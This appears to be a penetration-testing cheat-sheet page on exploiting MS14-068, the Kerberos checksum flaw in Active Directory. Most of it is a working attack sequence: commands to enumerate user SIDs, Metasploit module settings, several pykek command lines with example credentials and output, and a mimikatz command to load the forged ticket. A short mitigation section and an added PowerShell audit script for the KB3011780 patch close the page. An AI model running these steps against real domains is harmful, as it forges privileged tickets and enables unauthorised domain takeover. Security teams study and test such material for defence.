# MS14-068 Checksum Validation

This exploit requires knowing the user's SID. You can obtain it remotely with `rpcclient`, or with `wmi` if you already have access to the machine.

* RPCClient

```powershell
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
```

* WMI

```powershell
wmic useraccount get name,sid
Administrator  S-1-5-21-3415849876-833628785-5197346142-500
Guest          S-1-5-21-3415849876-833628785-5197346142-501
Administrator  S-1-5-21-297520375-2634728305-5197346142-500
Guest          S-1-5-21-297520375-2634728305-5197346142-501
krbtgt         S-1-5-21-297520375-2634728305-5197346142-502
lambda         S-1-5-21-297520375-2634728305-5197346142-1110
```

* Powerview

```powershell
Convert-NameToSid high-sec-corp.local\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502
```

* netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid`

Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

Generate a ticket with `metasploit` or `pykek`.

```powershell
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum

Name      Current Setting                                Required  Description
----      ---------------                                --------  -----------
DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD  P@ssw0rd                                       yes       The Domain User password
RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
RPORT     88                                             yes       The target port
Timeout   10                                             yes       The TCP timeout to establish connection and read data
USER      lambda                                         yes       The Domain User
USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
```

```powershell
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u @ -s -d -p
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
```

Then use `mimikatz` to load the ticket.

```powershell
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```

## Mitigations

* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell:

```powershell
get-hotfix 3011780
```

## References

* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
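The KB3011780 check from the Mitigations section, widened to every domain controller in the current domain. This is an added example, not code from the original page; it assumes the ActiveDirectory RSAT module is available, that the caller has admin rights on the DCs (Get-HotFix queries them remotely), and that DCs on OS versions released after the fix (Windows Server 2016 onward) never received this KB and are out of scope.

```powershell
# Added example (not from the original page): audit all DCs for KB3011780,
# the MS14-068 fix. Assumptions: ActiveDirectory module present, admin rights
# on each DC, and that only Server 2003/2008/2008 R2/2012/2012 R2 DCs need the
# standalone KB (later OS builds ship without it by design).
$Kb = 'KB3011780'
$AffectedOs = '2003|2008|2012'   # matches the affected Server versions above

$report = foreach ($dc in Get-ADDomainController -Filter *) {
    $status = $null
    if ($dc.OperatingSystem -and $dc.OperatingSystem -notmatch $AffectedOs) {
        $status = 'NotApplicable'
    } else {
        try {
            # Pull the full hotfix list and filter locally: Get-HotFix -Id
            # raises an error when the KB is absent, which would be
            # indistinguishable from a DC we simply could not reach.
            $installed = Get-HotFix -ComputerName $dc.HostName -ErrorAction Stop |
                Where-Object { $_.HotFixID -eq $Kb }
            $status = if ($installed) { 'Patched' } else { 'MISSING' }
        } catch {
            # Unreachable or access denied: report it, never assume patched.
            $status = "Unknown ($($_.Exception.Message))"
        }
    }
    [pscustomobject]@{
        DomainController = $dc.HostName
        OperatingSystem  = $dc.OperatingSystem
        Status           = $status
    }
}

$report | Format-Table -AutoSize

# Anything not patched or not applicable keeps issuing tickets that accept a
# forged PAC; unreachable DCs must be re-checked, not ignored.
$needsAction = $report | Where-Object { $_.Status -notin 'Patched', 'NotApplicable' }
if ($needsAction) {
    Write-Warning "DCs needing attention: $($needsAction.DomainController -join ', ')"
}
```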